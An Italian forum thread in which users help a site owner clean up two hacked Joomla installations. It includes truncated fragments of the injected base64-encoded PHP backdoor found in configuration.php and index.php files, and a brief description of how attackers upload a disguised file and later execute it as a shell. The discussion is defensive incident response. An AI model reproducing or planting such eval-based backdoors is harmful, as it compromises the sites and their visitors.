sito attaccato

[jeckodevelopment]

Comunque come dicevano prima, molto dipende dal mancato aggiornamento di Joomla o di uno dei suoi componenti. Le vulnerabilità di un sito dipendono da quello!

[alexsupers]

potrei aggionarlo ora via ftp che dici ? sarà da fare ?

[jeckodevelopment]

Prova

[alexsupers]

prima dicevo che non penso che sia l'aggiornameno il problema perchè sullo stesso spazio hosting vi sono 2 siti diversi con due istallazioni di joomla diverse . E tutte e due hanno lo stesso problema di accesso

[jeckodevelopment]

Si, però se entrambe le installazioni di Joomla non sono all'ultima versione, 1.5.14 purtroppo non ci vuole molto per estendere l'attacco a tutte e due. Come si diceva prima, potrebbe anche dipendere da un componente non aggiornato, magari il componente potrebbe essere presente in entrambe le installazioni...

[frascan]

bene! ora che finalmente hai guadagnato l'accesso ftp si può tentare di fare qualcosa.
L'aggiornamento in questo momento non ti risolverebbe il problema perchè in ogni caso sembra che il file compromesso sia il configuration.php che non devi toccare in caso di aggiornamento.
Per cui veniamo a noi: nella root di joomla hai un file configuration.php-dist che è un file configuration pulito. Scaricalo in locale e modifica le variabili necessarie per il collegamento al database, e le variabili relative ai path. Dopodichè lo carichi sul server e prima rinomini il tuo attuale configuration.php in qualcosa del tipo configuration.php_bak e poi rinonimi il configuration.php-dist in configuration.php e vediamo se si risolvono i problemi. Se è solo compromesso il configuration.php attuale dovresti risolvere.

[alexsupers]

vecchia stringa:
Fatal error: Cannot redeclare nau() (previously declared in /mnt/web4/53/36/52031736/htdocs/index.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/configuration.php(1) : eval()'d code on line 1

Nuova stringa:
Fatal error: Cannot redeclare nau() (previously declared in /mnt/web4/53/36/52031736/htdocs/index.php(1) : eval()'d code:1) in /mnt/web4/53/36/52031736/htdocs/libraries/joomla/config.php(1) : eval()'d code on line 1

Ho notato che all'inizio del configuration .php c'è una striga lunghissima preceduta da
<?php eval(base64_decode('aWYoIWlzc2V0KCRuYXUxKSl7ZnV ecc. ecc.

che roba è?

[vamba]

Ho notato che all'inizio del configuration .php c'è una striga lunghissima preceduta da
<?php eval(base64_decode('aWYoIWlzc2V0KCRuYXUxKSl7ZnV ecc. ecc.

Quel codice non non deve assolutamente esserci nle configuration.php
e fa riferimento a una parte di codice codificato in base64 che probabilmente attiva o è attivato da qualche altro file che, molto probabilmente, ti hanno caricato sul server.

[valex]

caspita, ma pensa te..

ma un buon vecchio backup non ce l'hai?

[alexsupers]

allora adesso ho la certezza dell'attacco da parte di qualcuno

qualche consiglio 

è troppo vecchio perdo un sacco di dati se ripristino il Backup

[frascan]

caspita mi sa che hanno fatto un bel lavoretto.
mi pare di capire che hanno incluso codice non solo nel configuration.php ma anche in altri file adesso vedo che è chiamato in causa il config.php nella directory libraries/joomla.
la cosa si fa alquanto complicata se è così.
come suggerisce vales un backup ce l'hai?

[vamba]

Bah ... non credo che il backup risolva molto, credo che il sito sia compromesso.
in quanto nello stesso backup avremo sempre le estensioni fallate, e magari anche del codicillo malefico in quanto e di solito attacchi del genere vengono effettuati i tempi diversi.
Esempio: un utente si iscrive e carica un'innoquo file immagine o testo camuffato che al 90% dei casi finisce nella cartella images/stories, poi utilizzando magari la stessa falla che gli ha permesso di entrare lui decomprime o rinomina il file, magari lo sposta pure se ha caricato un file che gli permette di usare la shell, e lo esegue ... creando lo scompiglio che molti di noi aihme si son trovati almeno una volta sul proprio sito.

[frascan]

riguardo al backup c'è da fare una precisazione: una cosa è il backup di files e cartelle di joomla una cosa è il backup del database.

qui c'è da mantenere la calma è riflettere prima di compiere qualsiasi azione. visto che è impensabile che tu vada a verificare file per file se c'è inserito del codice che non deve esserci a questo punto devi analizzare bene cosa hai installato sul sito come componenti, moduli e plugins aggiuntivi oltre a joomla fatta questa analisi allora si può iniziare a procedere.

[valex]

fai una cosa, prendi tutto il sito e trasportatelo sul tuo pc con xammp, almeno lavori meglio, spulci tra tutti i file e le cartelle, magari con dreamweaver cerchi il file che vuoi in tutta la directory...così potresti trovare qualcosa..

non penso ci siano problemi per il tuo pc, o sbaglio?

ma gli host non fanno di solito qualche backup di tutto il server?

[vamba]

riguardo al backup c'è da fare una precisazione: una cosa è il backup di files e cartelle di joomla una cosa è il backup del database.

Gisto ...
però a questo punto metteresti la mano sul fuoco che non abbiano messo del codice nascosto pure all'interno dei contenuti?....
o in altre tabelle del DB.
Ok capita raramente ... ma avere un backup del DB e non dei file prende parecchio tempo poi se si vuol far ricollimare tutto ...
sempre pensando alle estensioni che sono state aggiunte via via.....

Cosa ben diversa sarebbe invece un sisto Joomla liscio .. senza estensioni
il backup dei dati collimerebbe al 99,9% con un'installazione nuova liscia di Joomla.


Segui il consiglio di Valex se intendi lavorare su quei file

[frascan]

però a questo punto metteresti la mano sul fuoco che non abbiano messo del codice nascosto pure all'interno dei contenuti?....
o in altre tabelle del DB.

Dici bene. Visto il lavoretto di fino che mi pare abbiano fatto la mano sul fuoco non ce la metto proprio perchè che il rischio di carbonizzarmela

Come dice VMB molto dipende dalla complessità del sito in questione. Una cosa è un sito only joomla pulito pulito e ben altra cosa è un sito con installati vari componenti, moduli e plugins e magari anche codice esterno come contatori per statistiche web etc etc

[alexsupers]

allora con calma ..
i siti non hanno registrazione di utenti esterni
però c'è il forum dove è possibile accedere e inserire degli allegati , molto probabilmente sono passati da li
Stò controllando i file esistono molte cartelle con sigle tipo a35db br8c u71a e molte altre, queste cartelle sembrano vuote. Dentro altre si trovano dei file php con la stringa :
<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmF zZTY0X2RlY29kZ ecc ecc.

[valex]

scusa ma se prendi il vecchio backup e provi a sostituire solo i vari file di configurazione?

vado a tentativi....

certo se questo risolve sarà temporaneo, dovresti pure eliminare la causa...mmmm...

elimina tutti gli utenti del forum e tutti i file!

[alexsupers]

ci sono molti file index.php che iniziano con il codice

<?php eval(base64_decode('aWYoIWlzc2V0KCRuYXUxKSl7ZnVuY3Rpb24gbmF 1K

[frascan]

ma questi file index.php si trovano nelle directory di cui parlavi prima?